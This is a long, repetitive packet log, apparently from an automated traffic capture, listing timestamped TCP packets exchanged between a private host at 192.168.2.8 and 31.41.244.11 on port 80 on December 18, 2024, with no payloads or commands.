                                                                                                                                                                                          Dec 18, 2024 09:07:22.101136923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101159096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101210117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101800919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101923943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101958036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.101972103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.102061033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.102889061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.102924109 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.102960110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.102982044 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.103617907 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.103652954 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.103668928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.103688002 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.103701115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.104445934 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.104490042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.104504108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.104540110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.104590893 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105396032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105431080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105457067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105465889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105474949 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.105511904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.106230974 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.106265068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.106300116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.106314898 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107186079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107235909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107239962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107275963 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107285023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107952118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107985973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.107999086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.108021975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.108071089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.108886957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.108920097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.108954906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109047890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109833956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109869003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109905005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109935045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.109944105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.110533953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.110588074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.110622883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.110640049 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.110661030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111385107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111433029 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111659050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111707926 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111778975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111814022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111826897 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.111864090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.112792969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.112827063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.112843037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.112863064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.112911940 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.113456011 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.113589048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.113624096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.113655090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.113667011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.114484072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.114517927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.114554882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.114567995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.115304947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.115359068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.115360022 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.115395069 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.115405083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116040945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116086960 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116092920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116127968 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116175890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116949081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.116982937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117000103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117018938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117024899 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117063046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117774010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117866993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117899895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117921114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.117935896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.118837118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.118870974 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.118905067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.118922949 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.118947029 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119676113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119710922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119726896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119745970 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119755983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.119788885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120445013 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120479107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120496035 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120512962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120521069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.120563030 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121287107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121320009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121335983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121356964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121364117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.121397972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.122060061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.126048088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283210039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283227921 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283240080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283454895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283471107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283510923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283607006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283617973 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.283649921 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.284333944 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.284437895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.284461975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.284498930 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.284518957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.285217047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.285311937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.285335064 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.285366058 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.285397053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.286055088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.286147118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.286170006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.286195040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.286226988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287149906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287174940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287198067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287231922 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287257910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287940025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287972927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.287997007 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288017988 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288041115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288675070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288809061 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288832903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288849115 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.288871050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.289897919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.289921999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.289946079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.289959908 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.289982080 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.290436983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.290477991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.290501118 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.290537119 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.290564060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.291343927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.291398048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.291420937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.291443110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.291467905 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.292159081 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.292596102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.292622089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.292682886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.293024063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.293267965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.293297052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.293318033 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.293344021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294071913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294095039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294117928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294143915 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294158936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294789076 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294867039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294878006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294907093 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.294929028 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.295857906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.295871019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.295882940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.295909882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.295937061 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.296581984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.296595097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.296607018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.296632051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.296653986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297492981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297627926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297637939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297640085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297660112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.297677040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.298321962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.298335075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.298374891 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.298556089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299377918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299390078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299401045 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299420118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299429893 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299458027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.299978971 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300090075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300103903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300127983 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300148964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300853014 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300940037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300951958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.300975084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301001072 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301779985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301791906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301803112 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301835060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.301847935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.302620888 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.302872896 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.302921057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.302989960 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303002119 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303042889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303750038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303828955 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303838968 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303843021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.303879976 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.304619074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.304678917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.304689884 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.304728031 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.304743052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.305480003 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.305567026 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.305577993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.305613995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.305640936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.306341887 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.306412935 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.306423903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.306463957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.306482077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.307260990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.307358980 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.307370901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.307404041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.307440042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.308163881 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.308173895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.308185101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.308222055 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.308243990 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309009075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309031963 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309041977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309077024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309103966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.309839010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310039043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310050964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310112000 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310770035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310781002 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310792923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310822010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.310836077 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.311616898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.311672926 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.311683893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.311733007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:22.312535048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:22.312546968 CET804971431.41.244.11192.168.2.8
